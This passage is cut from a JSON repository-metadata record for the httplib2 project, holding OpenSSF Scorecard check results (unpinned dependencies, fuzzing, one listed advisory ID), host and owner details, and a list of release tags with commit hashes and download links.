.github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.